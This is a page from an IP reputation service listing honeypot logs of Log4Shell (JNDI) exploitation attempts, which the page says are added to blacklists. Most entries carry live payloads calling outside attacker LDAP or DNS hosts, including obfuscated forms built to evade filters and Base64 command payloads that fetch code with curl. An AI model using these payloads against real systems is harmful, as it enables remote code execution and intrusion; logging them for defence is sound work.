IP Reputation checker

Check the reputation of any IP address.

log4j honeypot logs (jndi)

Some real time logs from our honeypots that match the jndi (log4j) exploits. We are automatically adding them to our blacklists to get blocked.

    2022-01-12  162.241.69.182 
    URL: HEAD /
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99:1389/a}

2022-01-12 69.49.228.92
    URL: HEAD /
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99:1389/a}

2022-01-12 69.49.235.93
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base

2022-01-11 108.52.161.90
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F45.153.240.94%3A1389%2Fdrydat%7D
    Referer: -
    User Agent: ${jndi:ldap://45.153.240.94:1389/drydat}

2022-01-11 79.143.186.150
    URL: GET /
    Referer: https://google.com/${jndi:dns://6ppc9b34cfa1b2246b8afbf.y.psc4fuel.com/0tl73dFbB}
    User Agent: Mozilla/5.0

2022-01-11 79.143.186.150
    URL: POST /
    Referer: https://google.com${jndi:dns://6ppe74e30c7165e4eb798fb.y.psc4fuel.com/7nqigfrEe}
    User Agent: Mozilla/5.0

2022-01-11 3.94.100.157
    URL: GET /
    Referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Co
    User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Com

2022-01-11 172.84.98.201
    URL: GET /
    Referer: -
    User Agent: ${jndi:ldap://binance.ath.cx:1389/a}

2022-01-11 172.84.98.201
    URL: GET /
    Referer: -
    User Agent: ${jndi:ldap://binance.ath.cx:1389/a}

2022-01-10 69.49.235.93
    URL: HEAD /
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99:1389/a}

2022-01-10 79.143.186.150
    URL: GET /$%7Bjndi:$%7Blower:l%7D$%7Blower:d%7Da$%7Blower:p%7D://5pp824281be3ca24a88b271.y.psc4fuel
    Referer: -
    User Agent: Mozilla/5.0

2022-01-10 162.241.69.182
    URL: HEAD /
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99:1389/a}

2022-01-10 79.143.186.150
    URL: GET /
    Referer: https://google.com/${jndi:${lower:l}${lower:d}a${lower:p}://5ppf84fd83f874e45b88f8e.y.psc4fuel.com/T
    User Agent: Mozilla/5.0

2022-01-10 162.241.114.189
    URL: HEAD /
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99:1389/a}

2022-01-10 162.241.114.189
    URL: HEAD /
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99:1389/a}

2022-01-10 162.241.114.189
    URL: HEAD /
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99:1389/a}

2022-01-09 2.58.149.206
    URL: GET /
    Referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Comm
    User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Comm

2022-01-09 79.143.186.150
    URL: GET /$%7B$%7BueLd:JghU:kyH:C:TURit:-j%7D$%7BodX:t:STGD:UaqOvq:wANmU:-n%7D$%7BmgSejH:tpr:zWlb:-
    Referer: https://google.com/${${ueLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${
    User Agent: Mozilla/5.0

2022-01-09 79.143.186.150
    URL: POST /
    Referer: https://google.com${${ueLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${o
    User Agent: Mozilla/5.0

2022-01-08 79.143.186.150
    URL: GET /$%7Bjndi:$%7Blower:l%7D$%7Blower:d%7Da$%7Blower:p%7D://5ppf7bed300693243969356.y.psc4fuel
    Referer: https://google.com/${jndi:${lower:l}${lower:d}a${lower:p}://5ppf7bed300693243969356.y.psc4fuel.com/P
    User Agent: Mozilla/5.0

2022-01-08 79.143.186.150
    URL: GET /
    Referer: https://google.com/${jndi:${lower:l}${lower:d}a${lower:p}://5ppd8badb3638fd48848000.y.psc4fuel.com/n
    User Agent: Mozilla/5.0

2022-01-07 79.143.186.150
    URL: GET /$%7B$%7BueLd:JghU:kyH:C:TURit:-j%7D$%7BodX:t:STGD:UaqOvq:wANmU:-n%7D$%7BmgSejH:tpr:zWlb:-
    Referer: https://google.com/${${ueLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${
    User Agent: Mozilla/5.0

2022-01-07 79.143.186.150
    URL: GET /
    Referer: https://google.com/${${ueLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${
    User Agent: Mozilla/5.0

2022-01-05 162.241.114.189
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base

2022-01-05 79.143.186.150
    URL: GET /$%7Bjndi:$%7Blower:l%7D$%7Blower:d%7Da$%7Blower:p%7D://5pp6170995e890249cc83b7.y.psc4fuel
    Referer: -
    User Agent: Mozilla/5.0

2022-01-05 79.143.186.150
    URL: GET /
    Referer: https://google.com/${jndi:${lower:l}${lower:d}a${lower:p}://5pp4cb94585045d487c8962.y.psc4fuel.com/g
    User Agent: Mozilla/5.0

2022-01-05 172.111.36.142
    URL: GET /
    Referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Comm
    User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Comm

2022-01-05 162.241.121.96
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base

2022-01-05 162.241.121.96
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base

2022-01-04 142.162.49.147
    URL: GET /
    Referer: -
    User Agent: ${jndi:ldap://log4j-tester.trendmicro.com:1389/a9cf7f24-731b-4f74-9531-fb0822e352d8}

2022-01-04 69.49.228.92
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base

2022-01-04 69.49.228.92
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base

2022-01-04 69.49.228.92
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base6

2022-01-04 69.49.228.92
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base6

2022-01-04 162.241.114.189
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base

2022-01-04 162.241.114.189
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base

2022-01-04 162.241.121.96
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base

2022-01-04 54.235.231.227
    URL: GET /?action=%24%7Bjndi%3Aldap%3A%2F%2Fkgmustangscom.j86fha.ceye.io%7D
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://kgmustangscom.j86fha.ceye.io}
    User Agent: Mozilla/5.0

2022-01-04 162.241.69.182
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base

2022-01-04 162.241.69.182
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base

2022-01-04 162.241.114.189
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base

2022-01-04 162.241.114.189
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base

2022-01-04 162.241.121.96
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base

2022-01-04 162.241.121.96
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base

2022-01-04 162.241.114.189
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base

2022-01-04 162.241.114.189
    URL: HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk
    Referer: -
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base

2022-01-03 79.143.186.150
    URL: GET /$%7Bjndi:dns://6pp058183a7e1c248d6ae44.y.psc4fuel.com/5quCc2JFq%7D
    Referer: https://google.com/${jndi:dns://6pp058183a7e1c248d6ae44.y.psc4fuel.com/5quCc2JFq}
    User Agent: Mozilla/5.0

2022-01-03 15.236.146.246
    URL: GET /
    Referer: ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://6qnv7r
    User Agent: python-requests/2.26.0

2022-01-03 15.236.146.246
    URL: GET /
    Referer: -
    User Agent: ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://6qnv7r

2022-01-03 15.236.146.246
    URL: GET /
    Referer: ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://6qnv7r
    User Agent: python-requests/2.26.0

2022-01-03 15.236.146.246
    URL: GET /
    Referer: -
    User Agent: ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://6qnv7r

2022-01-02 15.236.146.246
    URL: GET /
    Referer: ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://ygeytd
    User Agent: python-requests/2.26.0

2022-01-02 15.236.146.246
    URL: GET /
    Referer: -
    User Agent: ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://ygeytd

2022-01-02 15.236.146.246
    URL: GET /
    Referer: ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://ygeytd
    User Agent: python-requests/2.26.0

2022-01-02 15.236.146.246
    URL: GET /
    Referer: -
    User Agent: ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://ygeytd

2022-01-02 15.236.146.246
    URL: GET /
    Referer: ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://o2le7z
    User Agent: python-requests/2.26.0

2022-01-02 15.236.146.246
    URL: GET /
    Referer: -
    User Agent: ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://o2le7z

2022-01-02 15.236.146.246
    URL: GET /
    Referer: ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://o2le7z
    User Agent: python-requests/2.26.0

2022-01-02 15.236.146.246
    URL: GET /
    Referer: -
    User Agent: ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://o2le7z

2022-01-02 199.127.60.104
    URL: GET /
    Referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}da${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Comma
    User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Comm

2022-01-02 45.135.232.116
    URL: GET /?x=${jndi:ldap://${hostName}./a}
    Referer: $jndi:ldap://${hostName}.referer.}
    User Agent: ${jndi:ldap://${hostName}.useragent.}

2022-01-02 45.135.232.116
    URL: GET /?x=${jndi:ldap://127.0.0.1
    Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.}
    User Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.}

2022-01-02 167.71.13.196
    URL: GET /$%7Bjndi:ldap://167.71.13.196:8444/lx-ffff5fb3c8f7bb010000efd16100000000ce21f7%7D?${jndi:
    Referer: -
    User Agent: ${jndi:ldap://167.71.13.196:8444/lx-ffff5fb3c8f7bb010800efd161000000002a7ec8}

2022-01-02 167.71.13.196
    URL: GET /$%7Bjndi:ldap://167.71.13.196:8444/lx-ffffb946a20bbb010044f0d0610000000072f670%7D?${jndi:
    Referer: -
    User Agent: ${jndi:ldap://167.71.13.196:8444/lx-ffffb946a20bbb010844f0d06100000000333618}

2022-01-02 15.236.146.246
    URL: GET /
    Referer: ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}${date:'l'}${date:'d'}${date:'a'}${date:'p'}://h959yl.
    User Agent: python-requests/2.26.0

2022-01-02 15.236.146.246
    URL: GET /
    Referer: -
    User Agent: ${${date:'j'}${date:'n'${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://h959yl.

2022-01-02 15.236.146.246
    URL: GET /
    Referer: ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://h959yl
    User Agent: python-requests/2.26.0

2022-01-01 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2022-01-01 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2022-01-01 195.54.160.149
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2022-01-01 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2022-01-01 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2022-01-01 195.54.160.149
    URL: GET /
    Referer: http://a.b.c.d:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2022-01-01 195.54.160.149
    URL: GET /
    Referer: http://140.82.47.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2022-01-01 195.54.160.149
    URL: GET /
    Referer: http://x.y.168.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2022-01-01 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.10:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1Lj
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2022-01-01 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-31 195.54.160.149
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-31 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-31 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-31 195.54.160.149
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-30 207.244.248.240
    URL: GET /login
    Referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Comm
    User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Comm

2021-12-30 162.241.69.182
    URL: HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w}
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/www.sshd-honeypot8/?id=${jndi:ldap}

2021-12-30 162.241.69.182
    URL: HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w}
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/sshd-honeypot8/?id=${jndi:ldap}

2021-12-30 162.241.69.182
    URL: HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w}
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/www.sshd-honeypot8/?id=${jndi:ldap}

2021-12-30 162.241.69.182
    URL: HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w}
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/sshd-honeypot8/?id=${jndi:ldap}

2021-12-30 69.49.235.93
    URL: HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w}
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/www.sshd-honeypot6/?id=${jndi:ldap}

2021-12-30 69.49.235.93
    URL: HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w}
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/www.sshd-honeypot6/?id=${jndi:ldap}

2021-12-30 69.49.235.93
    URL: HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w}
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/sshd-honeypot6/?id=${jndi:ldap}

2021-12-30 69.49.235.93
    URL: HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w}
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/sshd-honeypot6/?id=${jndi:ldap}

2021-12-30 162.241.69.182
    URL: HEAD /?id=${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w}
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99/ae4d14d64d1cbfe8042b12f47bc5e3e43w/www.sshd-honeypot7/?id=${jndi:ldap}

2021-12-29 142.162.49.147
    URL: GET /$%7B$%7Benv:ENV_NAME:-j%7Dn$%7Benv:ENV_NAME:-d%7Di$%7Benv:ENV_NAME:-:%7D$%7Benv:ENV_NAME:
    Referer: -
    User Agent: Mozilla/5.0

2021-12-29 142.162.49.147
    URL: GET /$%7B$%7Benv:ENV_NAME:-j%7Dn$%7Benv:ENV_NAME:-d%7Di$%7Benv:ENV_NAME:-:%7D$%7Benv:ENV_NAME:
    Referer: -
    User Agent: Mozilla/5.0

2021-12-29 195.54.160.149
    URL: GET /login
    Referer: http://a.b.c.e:80/dashboard
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-29 167.71.13.196
    URL: GET /$%7Bjndi:ldap://167.71.13.196:8444/lx-ffff2d209bbfbb0100c1c3cc610000000007e119%7D?${jndi:
    Referer: -
    User Agent: ${jndi:ldap://167.71.13.196:8444/lx-ffff2d209bbfbb0108c1c3cc6100000000bc978d}

2021-12-29 207.244.248.240
    URL: GET /
    Referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Comm
    User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Comm

2021-12-29 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-29 195.54.160.149
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-29 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.9:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-29 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.253:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-29 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.10:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1Lj
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-29 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-29 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-29 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.10:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1Lj
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-29 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.253:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
